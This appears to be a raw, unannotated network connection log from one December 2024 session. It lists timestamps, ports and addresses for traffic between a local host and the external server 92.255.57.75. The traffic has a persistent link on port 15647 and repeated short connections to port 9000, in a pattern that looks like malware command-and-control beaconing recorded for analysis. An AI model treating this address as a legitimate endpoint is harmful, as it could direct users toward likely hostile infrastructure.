Dec 17, 2024 08:39:31.934379101 CET	49918	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:32.010628939 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.010761023 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:32.054063082 CET	9000	49918	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.189425945 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.189791918 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:32.219296932 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.219600916 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:32.309535027 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.309604883 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:32.411544085 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.411639929 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:32.429389954 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.429856062 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:32.501815081 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.531495094 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.531732082 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:32.549666882 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.651560068 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.651719093 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:32.723865032 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.725359917 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:32.771574974 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.772002935 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:32.844022989 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.844211102 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:32.845057011 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.892282963 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.963917971 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:32.964021921 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:32.964055061 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.037519932 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.037666082 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.083832026 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.084084988 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.156250000 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.156389952 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.157427073 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.203915119 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.276137114 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.276231050 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.276308060 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.322936058 CET	9000	49918	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.323085070 CET	9000	49918	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.323132992 CET	49918	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.323168039 CET	49918	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.396063089 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.396214008 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.396214962 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.438821077 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.439774990 CET	49924	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.442989111 CET	9000	49918	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.557519913 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.557651043 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.559526920 CET	9000	49924	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.559715033 CET	49924	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.559783936 CET	49924	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.588423014 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.641652107 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.642044067 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.677541971 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.679481030 CET	9000	49924	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.761899948 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.762031078 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.780674934 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.780769110 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.869908094 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:33.870026112 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:33.900557995 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.013670921 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.013900995 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.177577972 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.178754091 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.182070971 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.235713959 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.249736071 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.249813080 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.298582077 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.369697094 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.369831085 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.374413013 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.423170090 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.491435051 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.491544008 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.653377056 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.655184984 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.682063103 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.735691071 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.774991035 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.775115967 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.803666115 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.805855036 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.874227047 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.874350071 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.883574009 CET	9000	49924	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.883738041 CET	9000	49924	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.883749008 CET	49924	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.883806944 CET	49924	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.925666094 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.986429930 CET	49930	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:34.995781898 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:34.995933056 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:35.003547907 CET	9000	49924	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.109034061 CET	9000	49930	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.109100103 CET	49930	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:35.109227896 CET	49930	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:35.117877007 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.117949009 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:35.230045080 CET	9000	49930	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.230552912 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.230637074 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:35.294429064 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.350951910 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.351097107 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:35.421777010 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.421938896 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:35.471028090 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.541760921 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.541862011 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:35.542615891 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.595057011 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:35.661909103 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.662074089 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:35.733984947 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.734210014 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:35.825484037 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.825566053 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:35.854087114 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.854209900 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.907529116 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:35.969728947 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:35.969810963 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.137546062 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.137598991 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.137635946 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.188875914 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.209613085 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.209757090 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.257354975 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.329493046 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.329782963 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.340204000 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.392014980 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.443996906 CET	9000	49930	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.444068909 CET	9000	49930	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.444153070 CET	49930	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.444305897 CET	49930	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.449676037 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.451787949 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.549411058 CET	49931	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.564913034 CET	9000	49930	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.617497921 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.617697954 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.641781092 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.642474890 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.669126987 CET	9000	49931	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.669193983 CET	49931	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.669339895 CET	49931	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.737606049 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.737663031 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.763740063 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.789030075 CET	9000	49931	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.813798904 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.877526045 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.877597094 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:36.955895901 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:36.956039906 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:37.041449070 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.041806936 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:37.069787979 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.071790934 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:37.075895071 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.161638021 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.161725044 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:37.189594984 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.235706091 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:37.241523981 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.241574049 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:37.281774998 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.353873968 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.353957891 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:37.361301899 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.361500978 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:37.473771095 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.473851919 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:37.587099075 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.587258101 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:37.629121065 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.629296064 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:37.666799068 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.707164049 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.708350897 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:37.749150991 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.785952091 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.786952019 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:37.828181982 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.899422884 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.899511099 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:37.906701088 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.941648960 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:37.941728115 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.001491070 CET	9000	49931	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.001614094 CET	9000	49931	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.001727104 CET	49931	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.004679918 CET	49931	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.061597109 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.093569040 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.098979950 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.124428988 CET	9000	49931	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.141485929 CET	49937	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.157537937 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.173736095 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.220032930 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.253451109 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.253503084 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.261327028 CET	9000	49937	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.261400938 CET	49937	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.261538029 CET	49937	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.291430950 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.345073938 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.373294115 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.373439074 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.381242990 CET	9000	49937	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.493208885 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.493480921 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.525624037 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.565654993 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.565973997 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.653446913 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.653647900 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.685699940 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.685937881 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.717725039 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.767338991 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.805907011 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.806241989 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.878047943 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.878129959 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:38.966835022 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:38.966918945 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.057404995 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.057493925 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.071248055 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.087626934 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.126390934 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.177290916 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.179789066 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.190330982 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.235976934 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.341491938 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.343889952 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.369684935 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.371824026 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.425666094 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.426109076 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.463730097 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.495451927 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.495579004 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.545941114 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.546013117 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.561973095 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.587831020 CET	9000	49937	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.587896109 CET	9000	49937	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.587951899 CET	49937	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.588062048 CET	49937	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.610771894 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.665844917 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.665931940 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.687736988 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.691086054 CET	49943	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.707866907 CET	9000	49937	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.735708952 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.797697067 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.799885988 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.811389923 CET	9000	49943	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.811492920 CET	49943	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.811650991 CET	49943	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.931349993 CET	9000	49943	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.973431110 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:39.975888968 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:39.978147984 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.032690048 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:40.096081018 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.099845886 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:40.112777948 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.157588959 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:40.170250893 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.171863079 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:40.265485048 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.267043114 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:40.288625956 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.288805008 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:40.291645050 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.386915922 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.408782959 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.411976099 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.431576014 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:40.579161882 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.579245090 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:40.741532087 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.743786097 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.743804932 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:40.798166037 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:40.863811016 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.863862038 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:40.891444921 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.935870886 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:40.935950994 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.025549889 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.025625944 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.055823088 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.055895090 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.056008101 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.108202934 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.137062073 CET	9000	49943	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.137098074 CET	9000	49943	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.137150049 CET	49943	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.137362957 CET	49943	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.175800085 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.175916910 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.180990934 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.235656977 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.253098011 CET	49949	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.257091045 CET	9000	49943	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.337856054 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.338165998 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.373102903 CET	9000	49949	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.373265028 CET	49949	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.373476982 CET	49949	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.489005089 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.489103079 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.493108988 CET	9000	49949	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.650473118 CET	15647	49796	92.255.57.75	192.168.2.11
